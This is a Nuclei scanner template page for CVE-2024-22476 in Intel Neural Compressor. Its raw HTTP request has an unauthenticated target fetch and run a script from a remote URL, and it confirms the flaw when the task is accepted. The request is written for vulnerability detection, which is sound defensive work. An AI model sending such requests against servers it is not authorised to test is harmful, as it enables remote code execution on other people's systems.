Skip to content
Nuclei Templates

Intel Neural Compressor <2.5.0 - SQL Injection

ID: CVE-2024-22476

Severity: critical

Author: ritikchaddha

Tags: cve,cve2024,intel,neural-compressor,sqli,intrusive,file-upload

Description

Section titled “Description”

Improper input validation in some Intel(R) Neural Compressor software before version 2.5.0 may allow an unauthenticated user to potentially enable escalation of privilege via remote access.

YAML Source

Section titled “YAML Source”
id: CVE-2024-22476


info:
  name: Intel Neural Compressor <2.5.0 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    Improper input validation in some Intel(R) Neural Compressor software before version 2.5.0 may allow an unauthenticated user to potentially enable escalation of privilege via remote access.
  reference:
    - https://huntr.com/bounties/300bffa9-b240-4201-a1d9-e3ec8d802e4a
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22476
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-22476
    cwe-id: CWE-20
    epss-score: 0.00043
    epss-percentile: 0.09691
  metadata:
    max-request: 1
  tags: cve,cve2024,intel,neural-compressor,sqli,intrusive,file-upload


http:
  - raw:
      - |
        POST /task/submit/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification/run_glue.py","optimized": "False","arguments": ["--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"],"approach": "static","requirements": [],"workers": 1}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'status":"successfully'
          - 'Task submitted successfully'
        condition: and


      - type: word
        part: content_type
        words:
          - 'application/json'


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f28d42ae82c243e66a5971364b1815cdf3bfe9cd270853547246947c51764d7902204f425c4ee8346afd897a5663b10f7e73db758c948bcb24e2ddd4944bd64fe1a0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-22476.yaml"

View on Github